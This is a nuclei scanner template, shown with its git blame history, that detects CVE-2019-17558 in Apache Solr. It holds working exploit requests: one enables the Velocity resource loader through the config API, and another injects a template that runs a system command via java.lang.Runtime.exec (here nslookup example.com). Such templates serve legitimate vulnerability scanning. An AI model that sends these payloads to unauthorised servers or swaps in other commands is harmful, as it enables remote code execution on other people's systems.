nuclei-templates/cves/2019/CVE-2019-17558.yaml

id: CVE-2019-17558
info:
  name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
  author: pikpikcu & madrobot
  severity: critical
  refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
  tags: cve,cve2019,apache,rce

requests:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

      - |
        POST /solr/§token§/config HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Connection: close
        Content-Type: application/json
        Content-Length: 259
        Upgrade-Insecure-Requests: 1

        {
            "update-queryresponsewriter": {
              "startup": "lazy",
              "name": "velocity",
              "class": "solr.VelocityResponseWriter",
              "template.base.dir": "",
              "solr.resource.loader.enabled": "true",
              "params.resource.loader.enabled": "true"
            }
        }

      - |
        GET /solr/§token§/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Connection: close
        Upgrade-Insecure-Requests: 1

    extractors:
      - type: regex
        part: body
        internal: true
        name: token
        group: 1
        regex:
          - "\"name\":\"(.*)\""

    matchers:
      - type: word
        words:
          - "Non-authoritative answer"
          - "example.com"
        condition: and
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-17558`
Create CVE-2019-17558.yaml 2020-09-03 16:13:34 +00:00			`info:`
			`name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template`
misc changes 2021-04-08 10:00:03 +00:00			`author: pikpikcu & madrobot`
Create CVE-2019-17558.yaml 2020-09-03 16:13:34 +00:00			`severity: critical`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558`
			`tags: cve,cve2019,apache,rce`
Create CVE-2019-17558.yaml 2020-09-03 16:13:34 +00:00
			`requests:`
Update CVE-2019-17558.yaml 2021-04-08 09:44:25 +00:00			`- raw:`
Update CVE-2019-17558.yaml 2020-09-03 17:14:42 +00:00			`- \|`
Update CVE-2019-17558.yaml 2021-04-08 09:44:25 +00:00			`GET /solr/admin/cores?wt=json HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept-Language: en`
			`Connection: close`
misc changes 2021-04-08 10:00:03 +00:00
Update CVE-2019-17558.yaml 2021-04-08 09:44:25 +00:00			`- \|`
			`POST /solr/§token§/config HTTP/1.1`
Update CVE-2019-17558.yaml 2020-09-03 17:14:42 +00:00			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Connection: close`
			`Content-Type: application/json`
			`Content-Length: 259`
			`Upgrade-Insecure-Requests: 1`
Create CVE-2019-17558.yaml 2020-09-03 16:13:34 +00:00
Update CVE-2019-17558.yaml 2020-09-03 17:14:42 +00:00			`{`
			`"update-queryresponsewriter": {`
			`"startup": "lazy",`
			`"name": "velocity",`
			`"class": "solr.VelocityResponseWriter",`
			`"template.base.dir": "",`
			`"solr.resource.loader.enabled": "true",`
			`"params.resource.loader.enabled": "true"`
			`}`
Create CVE-2019-17558.yaml 2020-09-03 16:13:34 +00:00			`}`
misc changes 2021-04-08 10:00:03 +00:00
Update CVE-2019-17558.yaml 2020-09-03 17:14:42 +00:00			`- \|`
Update CVE-2019-17558.yaml 2021-04-20 18:57:22 +00:00			`GET /solr/§token§/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1`
Update CVE-2019-17558.yaml 2020-09-03 17:14:42 +00:00			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Connection: close`
			`Upgrade-Insecure-Requests: 1`
misc changes 2021-04-08 10:00:03 +00:00
Update CVE-2019-17558.yaml 2021-04-08 09:44:25 +00:00			`extractors:`
Create CVE-2019-17558.yaml 2020-09-03 16:13:34 +00:00			`- type: regex`
			`part: body`
Update CVE-2019-17558.yaml 2021-04-08 09:44:25 +00:00			`internal: true`
			`name: token`
			`group: 1`
			`regex:`
			`- "\"name\":\"(.*)\""`

			`matchers:`
			`- type: word`
			`words:`
Update CVE-2019-17558.yaml 2021-04-20 18:57:22 +00:00			`- "Non-authoritative answer"`
			`- "example.com"`
			`condition: and`